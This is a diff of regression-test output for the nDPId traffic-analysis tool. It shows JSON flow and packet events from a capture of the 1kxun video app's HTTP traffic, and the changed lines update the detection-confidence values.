-00837{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2084,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385176794,"flow_last_seen":1654385176794,"flow_idle_time":7580000,"flow_min_l4_payload_len":207,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":207,"midstream":1,"thread_ts_msec":1654385176794,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":38314,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/40750-585645353a7a47615755b7714c611835.jpg","code":0,"content_type":"","user_agent":"okhttp\/3.10.0"}} +00837{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2084,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385176794,"flow_last_seen":1654385176794,"flow_idle_time":7580000,"flow_min_l4_payload_len":207,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":207,"midstream":1,"thread_ts_msec":1654385176794,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":38314,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/40750-585645353a7a47615755b7714c611835.jpg","code":0,"content_type":"","user_agent":"okhttp\/3.10.0"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2085,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385176795,"flow_last_seen":1654385176795,"flow_idle_time":7580000,"flow_min_l4_payload_len":207,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":207,"midstream":1,"thread_ts_msec":1654385176795,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":38316,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00747{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2085,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":171,"flow_packet_id":1,"flow_last_seen":1654385176795,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":273,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":273,"pkt_l4_len":239,"thread_ts_msec":1654385176795,"pkt":"tKXvZygQnLbQ0+MzCABFAAEDkpJAAEAGvoDAqAJ+rGl5UpWsAFD4\/KHAFVJVKoAYAfbp1wAAAQEICvK1uWDJom0fR0VUIC92aWRlb19rYW5rYW4vaW1hZ2VzL3ZpZGVvcy80MDcwMS04ZmE3ZDkxNmM1NWUzMWY5MGZhNTVmNDUwYjcxNjUwNS5qcGcgSFRUUC8xLjENCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpIb3N0OiBwaWMuMWt4dW4uY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClVzZXItQWdlbnQ6IG9raHR0cC8zLjEwLjANCg0K"} -00837{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2085,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385176795,"flow_last_seen":1654385176795,"flow_idle_time":7580000,"flow_min_l4_payload_len":207,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":207,"midstream":1,"thread_ts_msec":1654385176795,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":38316,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/40701-8fa7d916c55e31f90fa55f450b716505.jpg","code":0,"content_type":"","user_agent":"okhttp\/3.10.0"}} +00837{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2085,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385176795,"flow_last_seen":1654385176795,"flow_idle_time":7580000,"flow_min_l4_payload_len":207,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":207,"midstream":1,"thread_ts_msec":1654385176795,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":38316,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/40701-8fa7d916c55e31f90fa55f450b716505.jpg","code":0,"content_type":"","user_agent":"okhttp\/3.10.0"}} 00899{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2093,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":169,"flow_packet_id":2,"flow_last_seen":1654385177118,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":387,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":387,"pkt_l4_len":353,"thread_ts_msec":1654385177118,"pkt":"nLbQ0+MztKXvZygQCABFAAF1WjBAADYGAHGsaXlSwKgCfgBQlbaIVDfjwISJoIAYAOs4SwAAAQEICsmibd\/ytbleSFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG9wZW5yZXN0eS8xLjEzLjYuMQ0KRGF0ZTogU2F0LCAwNCBKdW4gMjAyMiAyMzoyNjoxNiBHTVQNCkNvbnRlbnQtVHlwZTogaW1hZ2UvanBlZw0KQ29udGVudC1MZW5ndGg6IDg3MzAzDQpMYXN0LU1vZGlmaWVkOiBTdW4sIDI5IE1heSAyMDIyIDAzOjI3OjU1IEdNVA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KRVRhZzogIjYyOTJlODNiLTE1NTA3Ig0KRXhwaXJlczogRnJpLCAwMiBTZXAgMjAyMiAyMzoyNjoxNiBHTVQNCkNhY2hlLUNvbnRyb2w6IG1heC1hZ2U9Nzc3NjAwMA0KQWNjZXB0LVJhbmdlczogYnl0ZXMNCg0K"} 02475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2094,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":169,"flow_packet_id":3,"flow_last_seen":1654385177118,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":1654385177118,"pkt":"nLbQ0+MztKXvZygQCABFAAXUWjFAADYG\/BCsaXlSwKgCfgBQlbaIVDkkwISJoIAQAOsFsgAAAQEICsmibd\/ytble\/9j\/4QAwRXhpZgAATU0AKgAAAAgAAQExAAIAAAAOAAAAGgAAAAB3d3cubWVpdHUuY29tAP\/bAEMAAgEBAQEBAgEBAQICAgICBAMCAgICBQQEAwQGBQYGBgUGBgYHCQgGBwkHBgYICwgJCgoKCgoGCAsMCwoMCQoKCv\/bAEMBAgICAgICBQMDBQoHBgcKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCv\/AABEIAeABkAMBEQACEQEDEQH\/xAAfAAABBQEBAQEBAQAAAAAAAAAAAQIDBAUGBwgJCgv\/xAC1EAACAQMDAgQDBQUEBAAAAX0BAgMABBEFEiExQQYTUWEHInEUMoGRoQgjQrHBFVLR8CQzYnKCCQoWFxgZGiUmJygpKjQ1Njc4OTpDREVGR0hJSlNUVVZXWFlaY2RlZmdoaWpzdHV2d3h5eoOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4eLj5OXm5+jp6vHy8\/T19vf4+fr\/xAAfAQADAQEBAQEBAQEBAAAAAAAAAQIDBAUGBwgJCgv\/xAC1EQACAQIEBAMEBwUEBAABAncAAQIDEQQFITEGEkFRB2FxEyIygQgUQpGhscEJIzNS8BVictEKFiQ04SXxFxgZGiYnKCkqNTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqCg4SFhoeIiYqSk5SVlpeYmZqio6Slpqeoqaqys7S1tre4ubrCw8TFxsfIycrS09TV1tfY2dri4+Tl5ufo6ery8\/T19vf4+fr\/2gAMAwEAAhEDEQA\/APgjVdV+IGpeNdTTTtd1OT\/iYShQt3If4z715latCnfmZ4ajObaSOi0zwV+0DrcSLpOm67cMW4EbSsen1ryK+aYKk\/enY7KeExc0rRubK\/Ab9smSMS2nw88XzK33THaTNn8jXGs\/ytys6y+86P7OzBL4GMPwE\/bXkJVfhP44LDsbGcVX9u5Zf+NH7w\/s\/MP+fbIJvgF+24fkf4R+NPqbWerWd5V\/z+X3g8uzD\/n2xY\/2Z\/24rhd0fwk8X\/iJB\/M0\/wC38q\/5+on+zcw\/kf3kkX7K\/wC3VOdsfwk8Xk9vmcfzapef5Sl\/GX4gssx\/8j+9Fgfsj\/t9Bdw+DnjFuP4Nzfyas3n2Uv8A5er8S1luYL7D\/D\/MY\/7Kv7e8QP8AxZTx6cf3LKdv5U\/7cyt\/8vl94\/7OzDrTZm3v7PH7cFqStz8GfiCCOv8AxK7v+grSOcZY9qy+8h4HHL\/l2\/uMq8+C\/wC2LaqWuvhV49QDqW0y7\/wrVZrlvSsvvM3gsb1hL7iinw2\/aqlk8qP4feOGbOCF066OP0qv7UwCX8aP3oSwmLf\/AC7l9zNTT\/gP+2Hf\/wCp+H3i9Af+e6yR\/wDoRFc887yuG9ZfI1jgMa1pTZrWv7Nf7Ygw8nhfX4x3Mt2ygfiWrlnn+WW0maLLsd1gXrb4P\/tRaU+24stVJHUJflz\/AOOk1xTznLpbTf3MpZfjVo4\/idL4f+HH7SdyQh0LWyfe7Kj\/AMeIry6+cZf0q\/mb08vxr3j+KOx0n4QfH3CreaPrKE9N2oqB+r1xf2vQl8E2\/lL\/ACOlYKUfjVvmv8zft\/gv8cXj\/d22ok44X+2IM\/8Ao2iOOnLbm\/8AAZf5DdKnHeUV\/wBvR\/zKOq\/Aj9qa4UjR\/C\/iCcnp5N3E3\/tWuunjacfjbXyl\/kYTo8\/wST\/7ej\/mcN4r\/Z4\/bdTcYfhb44kHP\/HvbNJ\/6Cxr06GZ5fH4qn33OWeDxTeiv81\/med+IPhH+2JprN9t+FfxCjx1zpNx\/SvUpZplb\/5fx\/8AAjllgsd\/I\/uOR1fSf2hdLYrq3h\/x"} 00902{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2099,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":170,"flow_packet_id":2,"flow_last_seen":1654385177120,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":388,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":388,"pkt_l4_len":354,"thread_ts_msec":1654385177120,"pkt":"nLbQ0+MztKXvZygQCABFAAF2wDBAADYGmm+saXlSwKgCfgBQlar6OK3h5ubbqoAYAOuKlwAAAQEICsmibeLytbleSFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG9wZW5yZXN0eS8xLjEzLjYuMQ0KRGF0ZTogU2F0LCAwNCBKdW4gMjAyMiAyMzoyNjoxNiBHTVQNCkNvbnRlbnQtVHlwZTogaW1hZ2UvanBlZw0KQ29udGVudC1MZW5ndGg6IDEwMzg1NA0KTGFzdC1Nb2RpZmllZDogU2F0LCAwNCBKdW4gMjAyMiAwMzo1OTo1MiBHTVQNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkVUYWc6ICI2MjlhZDhiOC0xOTVhZSINCkV4cGlyZXM6IEZyaSwgMDIgU2VwIDIwMjIgMjM6MjY6MTYgR01UDQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTc3NzYwMDANCkFjY2VwdC1SYW5nZXM6IGJ5dGVzDQoNCg=="} @@ -895,192 +894,191 @@ 02439{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2104,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":171,"flow_packet_id":3,"flow_last_seen":1654385177120,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":1654385177120,"pkt":"nLbQ0+MztKXvZygQCABFAAXUOPVAADcGHE2saXlSwKgCfgBQlawVUlZs+Pyij4AQAOvAhQAAAQEICsmibePytblg\/9j\/4AAQSkZJRgABAQAAAQABAAD\/4QAwRXhpZgAATU0AKgAAAAgAAQExAAIAAAAOAAAAGgAAAAB3d3cubWVpdHUuY29tAP\/bAEMAAgEBAQEBAgEBAQICAgICBAMCAgICBQQEAwQGBQYGBgUGBgYHCQgGBwkHBgYICwgJCgoKCgoGCAsMCwoMCQoKCv\/bAEMBAgICAgICBQMDBQoHBgcKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCv\/AABEIAeABkAMBEQACEQEDEQH\/xAAfAAABBQEBAQEBAQAAAAAAAAAAAQIDBAUGBwgJCgv\/xAC1EAACAQMDAgQDBQUEBAAAAX0BAgMABBEFEiExQQYTUWEHInEUMoGRoQgjQrHBFVLR8CQzYnKCCQoWFxgZGiUmJygpKjQ1Njc4OTpDREVGR0hJSlNUVVZXWFlaY2RlZmdoaWpzdHV2d3h5eoOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4eLj5OXm5+jp6vHy8\/T19vf4+fr\/xAAfAQADAQEBAQEBAQEBAAAAAAAAAQIDBAUGBwgJCgv\/xAC1EQACAQIEBAMEBwUEBAABAncAAQIDEQQFITEGEkFRB2FxEyIygQgUQpGhscEJIzNS8BVictEKFiQ04SXxFxgZGiYnKCkqNTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqCg4SFhoeIiYqSk5SVlpeYmZqio6Slpqeoqaqys7S1tre4ubrCw8TFxsfIycrS09TV1tfY2dri4+Tl5ufo6ery8\/T19vf4+fr\/2gAMAwEAAhEDEQA\/AM3xD4j8QR63dH+1L3ck7AhpTgjPBPp9a\/VPccFof5r162IeInzSlfmfV935klt4p8UWcKZ1e5k3sD5byHgdiM9Ki0XpY3p4nF04JqUtfN\/5kWoeK\/FN8+06lKMqeFmI9\/XkU1GNtjSWKxMre9L73\/mVZ\/FfiJIVhGrTjBypM5IH5UcsexMq2Itbmd\/8T\/zHjxZrAsGh\/tq4Eh6l5zkH+tCjFO9ivb1fZNObv3u\/8xfDesa7dXksk+szZhQBczHkk9+4470q0o2VkVgJ16lV3nLTzf8AmdDFe+IrjJfVroKgIGJSFJ9Ov6elcz5bbHt0nXvrKX3v\/MxvH2reIn8O3E66xdI1tiSOQzkHk8qPY56VVGSjOyW5GL9q8O5OUtPN\/wCZ523jPxLMm0+ILsqByDM3ynOeK6ZKDd0jx1VxCfxy+9\/5lC48T+JplCrr13ye07c+3Xilyx7HRDE1oy1nL72UbvXPEka7pPEV4WzgkXDf40nCL6HbDG4iX2397\/zMy\/8AFHii1yo8S3hJ4P8ApLcdfek4xS2O+jiK1RfE\/vf+Zz2oeLfFKsVHiC8JP3Nty3Hr0NZ8sb7HqUq1a1uZ\/ezNuPF3ifcT\/wAJBfjjki6b\/GjljfY7KdWra3O\/vZTbxZ4tdhu8R3oPQK10x4\/OhxS6HWqtRbSf3sp3HizxZsGfEN7gc83b\/wCNRKMexvGtUT+J\/eyrc+LfFrMWXxHfZwMf6U3T86nlj2OilWqcvxP72VX8V+LSPKl8RXxXA4+0vyc9eDRyx7HTGtUvpJ\/eyC68YeKVk\/d+JdQjAXDbLx8n8CaOWL6GsKtXl1k382UZPF3jEyYPjLUeucNdMQP1qOWK3R1Rrzt1+9kT+KfF8YP\/ABU92TnJH2t846etLkS6Gyrzl9p\/eyGTxV4uljUQa\/enqWzev19Ov+eKlxT6IpVpqWsn97M6bxP4uZR\/xUWolif+f5+ffrWbp0+qOyFeo38T+8py+KPFyqsv\/CUamoYEjdeP\/Q0nSp9jup4yq7q\/"} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2269,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385181857,"flow_last_seen":1654385181857,"flow_idle_time":7580000,"flow_min_l4_payload_len":409,"flow_max_l4_payload_len":409,"flow_tot_l4_payload_len":409,"flow_avg_l4_payload_len":409,"midstream":1,"thread_ts_msec":1654385181857,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"104.117.221.10","src_port":59324,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01018{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2269,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":172,"flow_packet_id":1,"flow_last_seen":1654385181857,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":475,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":475,"pkt_l4_len":441,"thread_ts_msec":1654385181857,"pkt":"tKXvZygQnLbQ0+MzCABFAAHNXapAAEAG0trAqAJ+aHXdCue8AFBxmTfMTd+OWYAYAfYKZgAAAQEIColJBIxVzQaLR0VUIC9zZGsvdnBhZG4tc2RrLWNvcmUtdjEuanMgSFRUUC8xLjENCkhvc3Q6IG0udnBvbi5jb20NCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChMaW51eDsgQW5kcm9pZCAxMTsgc2RrX2dwaG9uZV94ODYgQnVpbGQvUlNSMS4yMDEwMTMuMDAxOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzgzLjAuNDEwMy4xMDYgTW9iaWxlIFNhZmFyaS81MzcuMzYoTW9iaWxlOyB2cGFkbi1zZGstYS12NC42LjQpDQpBY2NlcHQ6ICovKg0KWC1SZXF1ZXN0ZWQtV2l0aDogY29tLnNjZW5ld2F5Lmthbmthbg0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45DQoNCg=="} -00965{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2269,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385181857,"flow_last_seen":1654385181857,"flow_idle_time":7580000,"flow_min_l4_payload_len":409,"flow_max_l4_payload_len":409,"flow_tot_l4_payload_len":409,"flow_avg_l4_payload_len":409,"midstream":1,"thread_ts_msec":1654385181857,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"104.117.221.10","src_port":59324,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"m.vpon.com","url":"m.vpon.com\/sdk\/vpadn-sdk-core-v1.js","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36(Mobile; vpadn-sdk-a-v4.6.4)"}} +00965{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2269,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385181857,"flow_last_seen":1654385181857,"flow_idle_time":7580000,"flow_min_l4_payload_len":409,"flow_max_l4_payload_len":409,"flow_tot_l4_payload_len":409,"flow_avg_l4_payload_len":409,"midstream":1,"thread_ts_msec":1654385181857,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"104.117.221.10","src_port":59324,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"m.vpon.com","url":"m.vpon.com\/sdk\/vpadn-sdk-core-v1.js","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36(Mobile; vpadn-sdk-a-v4.6.4)"}} 01786{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2270,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":172,"flow_packet_id":2,"flow_last_seen":1654385181897,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1049,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1049,"pkt_l4_len":1015,"thread_ts_msec":1654385181897,"pkt":"nLbQ0+MztKXvZygQCABFAAQLdzRAADgGvxJodd0KwKgCfgBQ57xN345ZcZk5ZYAYAfojewAAAQEIClXNBrWJSQSMSFRUUC8xLjEgMjAwIE9LDQpBY2NlcHQtUmFuZ2VzOiBieXRlcw0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LWphdmFzY3JpcHQNCkVUYWc6ICJmMWI1MmIwZWFiNDg4Y2QzMzM3NjIxYWY5ZGNlNjk1YToxNjIxOTI0MDYxLjYzNTEzNCINCkxhc3QtTW9kaWZpZWQ6IFR1ZSwgMjUgTWF5IDIwMjEgMDY6MDI6MzkgR01UDQpTZXJ2ZXI6IEFrYW1haU5ldFN0b3JhZ2UNCkNvbnRlbnQtTGVuZ3RoOiA2MTcNCkNhY2hlLUNvbnRyb2w6IG1heC1hZ2U9MTI5NjAwDQpFeHBpcmVzOiBNb24sIDA2IEp1biAyMDIyIDExOjI2OjIxIEdNVA0KRGF0ZTogU2F0LCAwNCBKdW4gMjAyMiAyMzoyNjoyMSBHTVQNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCg0KdmFyIHVhTWF0Y2g9ZnVuY3Rpb24oYSl7cmV0dXJuLTEhPSh3aW5kb3cubmF2aWdhdG9yP3dpbmRvdy5uYXZpZ2F0b3IudXNlckFnZW50OiIiKS5pbmRleE9mKGEpfSxpc1NESz1mdW5jdGlvbigpe3JldHVybiBpc1NES2lPUygpfHxpc1NES0FuZHJvaWQoKX0saXNTREtpT1M9ZnVuY3Rpb24oKXtyZXR1cm4odWFNYXRjaCgiKGlQYWQiKXx8dWFNYXRjaCgiKGlQb2QiKXx8dWFNYXRjaCgiKGlQaG9uZSIpKSYmIXVhTWF0Y2goIlNhZmFyaSIpfSxpc1NES0FuZHJvaWQ9ZnVuY3Rpb24oKXtyZXR1cm4gdWFNYXRjaCgidnBhZG4tc2RrLWEiKX0saXNVc2VIdHRwcz1mdW5jdGlvbigpe3JldHVybiEwfSxnZXRQcm90b2NvbFN0cmluZz1mdW5jdGlvbigpe3JldHVybiBpc1VzZUh0dHBzKCk\/Imh0dHBzOi8vIjoiaHR0cDovLyJ9O2RvY3VtZW50LndyaXRlKCc8c2NyaXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCIgc3JjPSInKyhpc1NES0FuZHJvaWQoKT9nZXRQcm90b2NvbFN0cmluZygpKyJtLnZwYWRuLmNvbS9zZGsvdnBhZG4tc2RrLWEtY29yZS12MS5qcyI6Z2V0UHJvdG9jb2xTdHJpbmcoKSsibS52cGFkbi5jb20vc2RrL3ZwYWRuLXNkay1pLWNvcmUtdjEuanMiKSsnIj48L3NjcmlwdD4nKTs="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2271,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385183491,"flow_last_seen":1654385183491,"flow_idle_time":7580000,"flow_min_l4_payload_len":810,"flow_max_l4_payload_len":810,"flow_tot_l4_payload_len":810,"flow_avg_l4_payload_len":810,"midstream":1,"thread_ts_msec":1654385183491,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"3.72.69.158","src_port":56094,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01551{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2271,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":173,"flow_packet_id":1,"flow_last_seen":1654385183491,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":876,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":876,"pkt_l4_len":842,"thread_ts_msec":1654385183491,"pkt":"tKXvZygQnLbQ0+MzCABFAANeKchAAEAGAcbAqAJ+A0hFntseAFDfmpSQ59fP2oAYAfYPXQAAAQEICnsWmml\/RrINR0VUIC9yZXdhcmRzZXR0aW5nP2FwcF9pZD0zMjQ1NiZzaWduPTNjMjhkZWQwNGUwZjQwOTAyMjk5Njg2MTgyNDRiNTgzJmNoYW5uZWw9JnBsYXRmb3JtPTEmb3NfdmVyc2lvbj0xMSZwYWNrYWdlX25hbWU9Y29tLnNjZW5ld2F5LmthbmthbiZhcHBfdmVyc2lvbl9uYW1lPTIuOC4yLjEmYXBwX3ZlcnNpb25fY29kZT0xNDYmb3JpZW50YXRpb249MiZtb2RlbD1zZGtfZ3Bob25lX3g4NiZicmFuZD1nb29nbGUmZ2FpZD0mbW5jPSZtY2M9Jm5ldHdvcmtfdHlwZT0xJm5ldHdvcmtfc3RyPSZsYW5ndWFnZT1lbiZ0aW1lem9uZT1HTVQlMkIwMSUzQTAwJnVzZXJhZ2VudD1Nb3ppbGxhJTJGNS4wJTIwJTI4TGludXglM0IlMjBBbmRyb2lkJTIwMTElM0IlMjBzZGtfZ3Bob25lX3g4NiUyMEJ1aWxkJTJGUlNSMS4yMDEwMTMuMDAxJTNCJTIwd3YlMjklMjBBcHBsZVdlYktpdCUyRjUzNy4zNiUyMCUyOEtIVE1MJTJDJTIwbGlrZSUyMEdlY2tvJTI5JTIwVmVyc2lvbiUyRjQuMCUyMENocm9tZSUyRjgzLjAuNDEwMy4xMDYlMjBNb2JpbGUlMjBTYWZhcmklMkY1MzcuMzYmc2RrX3ZlcnNpb249TUFMXzguNy40JmdwX3ZlcnNpb249MjIuNC4yNS0yMSUyMCU1QjAlNUQlMjAlNUJQUiU1RCUyMDMzNzk1OTQwNSZzY3JlZW5fc2l6ZT0xNzk0eDEwODAmaXNfY2xldmVyPTIgSFRUUC8xLjENCkNoYXJzZXQ6IFVURi04DQpIb3N0OiBzZXR0aW5nLnJheWp1bXAuY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBBcGFjaGUtSHR0cENsaWVudC9VTkFWQUlMQUJMRSAoamF2YSAxLjQpDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANCg0K"} -01456{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2271,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385183491,"flow_last_seen":1654385183491,"flow_idle_time":7580000,"flow_min_l4_payload_len":810,"flow_max_l4_payload_len":810,"flow_tot_l4_payload_len":810,"flow_avg_l4_payload_len":810,"midstream":1,"thread_ts_msec":1654385183491,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"3.72.69.158","src_port":56094,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"setting.rayjump.com","url":"setting.rayjump.com\/rewardsetting?app_id=32456&sign=3c28ded04e0f4090229968618244b583&channel=&platform=1&os_version=11&package_name=com.sceneway.kankan&app_version_name=2.8.2.1&app_version_code=146&orientation=2&model=sdk_gphone_x86&brand=google&gaid=&mnc=&mcc=&network_type=1&network_str=&language=en&timezone=GMT%2B01%3A00&useragent=Mozilla%2F5.0%20%28Linux%3B%20Android%2011%3B%20sdk_gphone_x86%20Build%2FRSR1.201013.001%3B%20wv%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Version%2F4.0%20Chrome%2F83.0.4103.106%20Mobile%20Safari%2F537.36&sdk_version=MAL_8.7.4&gp_version=22.4.25-21%20%5B0%5D%20%5BPR%5D%20337959405&screen_size=1794x1080&is_clever=2","code":0,"content_type":"","user_agent":"Apache-HttpClient\/UNAVAILABLE (java 1.4)"}} 